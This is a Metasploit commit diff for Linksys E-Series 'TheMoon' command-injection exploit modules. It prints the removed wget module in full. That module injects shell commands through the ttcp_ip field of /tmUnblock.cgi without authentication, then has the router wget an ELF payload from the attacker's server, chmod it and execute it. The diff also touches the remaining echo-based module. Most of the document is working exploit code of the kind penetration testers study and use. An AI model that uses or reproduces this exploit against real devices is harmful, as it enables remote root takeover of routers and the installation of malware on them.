remove the wget module, remove the cmd stuff, testing bind stuff ahead

2014-02-28 22:44:26 +01:00 · 2014-02-28 22:44:26 +01:00 · 15345da9d8
parent 2935f4f562
commit 15345da9d8
2 changed files with 4 additions and 268 deletions
--- a/modules/exploits/linux/http/linksys_themoon_exec_echo.rb
+++ b/modules/exploits/linux/http/linksys_themoon_exec_echo.rb
@ -36,9 +36,12 @@ class Metasploit3 < Msf::Exploit::Remote
      'References'  =>
        [
          [ 'EDB', '31683' ],
+          [ 'BID', '65585' ],
+          [ 'OSVDB', '103321' ],
          [ 'URL', 'http://packetstormsecurity.com/files/125253/linksyseseries-exec.txt' ],
          [ 'URL', 'http://packetstormsecurity.com/files/125252/Linksys-Worm-Remote-Root.html' ],
-          [ 'URL', 'https://isc.sans.edu/diary/Linksys+Worm+%22TheMoon%22+Summary%3A+What+we+know+so+far/17633' ]
+          [ 'URL', 'https://isc.sans.edu/diary/Linksys+Worm+%22TheMoon%22+Summary%3A+What+we+know+so+far/17633' ],
+          [ 'URL', 'https://isc.sans.edu/forums/diary/Linksys+Worm+TheMoon+Captured/17630' ]
        ],
      'DisclosureDate' => 'Feb 13 2014',
      'Privileged'     => true,
@ -49,12 +52,6 @@ class Metasploit3 < Msf::Exploit::Remote
        },
      'Targets'        =>
        [
-          [ 'CMD',
-            {
-            'Arch' => ARCH_CMD,
-            'Platform' => 'unix'
-            }
-          ],
          [ 'Linux mipsel Payload',
            {
            'Arch' => ARCH_MIPSLE,
@ -116,20 +113,6 @@ class Metasploit3 < Msf::Exploit::Remote
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end

-    if target.name =~ /CMD/
-      if not (datastore['CMD'])
-        fail_with(Failure::BadConfig, "#{peer} - Only the cmd/generic payload is compatible")
-      end
-      cmd = payload.encoded
-      res = execute_command(cmd,"0")
-      if (!res)
-        fail_with(Failure::Unknown, "#{peer} - Unable to execute payload")
-      else
-        print_status("#{peer} - Blind Exploitation - unknown Exploitation state")
-      end
-      return
-    end
-
    execute_cmdstager(
      :linemax => 26
    )
--- a/modules/exploits/linux/http/linksys_themoon_exec_wget.rb
+++ b/modules/exploits/linux/http/linksys_themoon_exec_wget.rb
@ -1,247 +0,0 @@
-##
-# This module requires Metasploit: http//metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Exploit::Remote
-  Rank = ExcellentRanking
-
-  include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::Remote::HttpServer
-  include Msf::Exploit::EXE
-  include Msf::Exploit::FileDropper
-
-  def initialize(info = {})
-    super(update_info(info,
-      'Name'        => 'Linksys E-Series TheMoon Remote Command Injection',
-      'Description' => %q{
-          Some Linksys E-Series Routers are vulnerable to an unauthenticated OS command
-        injection. Since it is a blind os command injection vulnerability, there is no
-        output for the executed command when using the cmd generic payload. A ping
-        command against a controlled system could be used for testing purposes. This
-        vulnerability was used from the so called "TheMoon" worm. There are many Systems
-        that might be vulnerable: E4200, E3200, E3000, E2500, E2100L, E2000, E1550, E1500,
-        E1200, E1000, E900. This module was tested against a E1500 v1.0.5.
-      },
-      'Author'      =>
-        [
-          'Johannes Ullrich', #worm discovery
-          'Rew', # original exploit
-          'infodox', # another exploit
-          'Michael Messner <devnull@s3cur1ty.de>', # Metasploit module
-          'juan vazquez' # minor help with msf module
-        ],
-      'License'     => MSF_LICENSE,
-      'References'  =>
-        [
-          [ 'EDB', '31683' ],
-          [ 'URL', 'http://packetstormsecurity.com/files/125252/Linksys-Worm-Remote-Root.html' ],
-          [ 'URL', 'https://isc.sans.edu/diary/Linksys+Worm+%22TheMoon%22+Summary%3A+What+we+know+so+far/17633' ]
-        ],
-      'DisclosureDate' => 'Feb 13 2014',
-      'Privileged'     => true,
-      'Platform'       => %w{ linux unix },
-      'Payload'        =>
-        {
-          'DisableNops' => true
-        },
-      'Targets'        =>
-        [
-          [ 'CMD',
-            {
-            'Arch' => ARCH_CMD,
-            'Platform' => 'unix'
-            }
-          ],
-          [ 'Linux mipsel Payload',
-            {
-            'Arch' => ARCH_MIPSLE,
-            'Platform' => 'linux'
-            }
-          ],
-        ],
-      'DefaultTarget'  => 1
-      ))
-
-    register_options(
-      [
-        OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]),
-        OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),
-        OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60])
-      ], self.class)
-  end
-
-
-  def request(cmd,uri)
-    begin
-      res = send_request_cgi({
-        'uri'    => uri,
-        'method' => 'POST',
-        'encode_params' => false,
-        'vars_post' => {
-          "submit_button" => "",
-          "change_action" => "",
-          "action" => "",
-          "commit" => "0",
-          "ttcp_num" => "2",
-          "ttcp_size" => "2",
-          "ttcp_ip" => "-h `#{cmd}`",
-          "StartEPI" => "1"
-        }
-      })
-      return res
-    rescue ::Rex::ConnectionError
-      vprint_error("#{peer} - Failed to connect to the web server")
-      return nil
-    end
-  end
-
-  def exploit
-    downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
-    uri = '/tmUnblock.cgi'
-    rhost = datastore['RHOST']
-    rport = datastore['RPORT']
-
-    #
-    # testing Login
-    #
-    print_status("#{peer} - Trying to access the vulnerable url")
-    begin
-      res = send_request_cgi({
-        'uri'     => uri,
-        'method'  => 'GET',
-      })
-      if res.nil? or res.code == 404
-        fail_with(Failure::NoAccess, "#{peer} - No successful login possible")
-      end
-      if [200, 301, 302].include?(res.code)
-        print_good("#{peer} - Successfully accessed #{uri}")
-      else
-        fail_with(Failure::NoAccess, "#{peer} - No successful login possible")
-      end
-    rescue ::Rex::ConnectionError
-      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
-    end
-
-    if target.name =~ /CMD/
-      if not (datastore['CMD'])
-        fail_with(Failure::BadConfig, "#{peer} - Only the cmd/generic payload is compatible")
-      end
-      cmd = payload.encoded
-      res = request(cmd,uri)
-      if (!res)
-        fail_with(Failure::Unknown, "#{peer} - Unable to execute payload")
-      else
-        print_status("#{peer} - Blind Exploitation - unknown Exploitation state")
-      end
-      return
-    end
-
-    #thx to Juan for his awesome work on the mipsel elf support
-    @pl = generate_payload_exe
-    @elf_sent = false
-
-    #
-    # start our server
-    #
-    resource_uri = '/' + downfile
-
-    if (datastore['DOWNHOST'])
-      service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
-    else
-      #do not use SSL
-      if datastore['SSL']
-        ssl_restore = true
-        datastore['SSL'] = false
-      end
-
-      #we use SRVHOST as download IP for the coming wget command.
-      #SRVHOST needs a real IP address of our download host
-      if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
-        srv_host = Rex::Socket.source_address(rhost)
-      else
-        srv_host = datastore['SRVHOST']
-      end
-
-      service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
-      print_status("#{peer} - Starting up our web service on #{service_url} ...")
-      start_service({'Uri' => {
-        'Proc' => Proc.new { |cli, req|
-          on_request_uri(cli, req)
-        },
-        'Path' => resource_uri
-      }})
-
-      datastore['SSL'] = true if ssl_restore
-    end
-
-    print_status("#{peer} - Asking the Linksys device to download and execute #{service_url}")
-    #this filename is used to store the payload on the device
-    filename = rand_text_alpha_lower(8)
-
-    cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}"
-    res = request(cmd,uri)
-    if (!res)
-      fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload")
-    end
-
-    # wait for payload download
-    if (datastore['DOWNHOST'])
-      print_status("#{peer} - Giving #{datastore['HTTP_DELAY']} seconds to the Linksys device to download the payload")
-      select(nil, nil, nil, datastore['HTTP_DELAY'])
-    else
-      wait_linux_payload
-    end
-    register_file_for_cleanup("/tmp/#{filename}")
-
-    #
-    # chmod
-    #
-    cmd = "chmod 777 /tmp/#{filename}"
-    print_status("#{peer} - Asking the Linksys device to chmod #{downfile}")
-    res = request(cmd,uri)
-    if (!res)
-      fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload")
-    end
-
-    #
-    # execute
-    #
-    cmd = "/tmp/#{filename}"
-    print_status("#{peer} - Asking the Linksys device to execute #{downfile}")
-    res = request(cmd,uri)
-    if (!res)
-      fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload")
-    end
-
-
-  end
-
-  # Handle incoming requests from the server
-  def on_request_uri(cli, request)
-    if (not @pl)
-      print_error("#{peer} - A request came in, but the payload wasn't ready yet!")
-      return
-    end
-    print_status("#{peer} - Sending the payload to the server...")
-    @elf_sent = true
-    send_response(cli, @pl)
-  end
-
-  # wait for the data to be sent
-  def wait_linux_payload
-    print_status("#{peer} - Waiting for the victim to request the ELF payload...")
-
-    waited = 0
-    while (not @elf_sent)
-      select(nil, nil, nil, 1)
-      waited += 1
-      if (waited > datastore['HTTP_DELAY'])
-        fail_with(Failure::Unknown, "#{peer} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?")
-      end
-    end
-  end
-
-end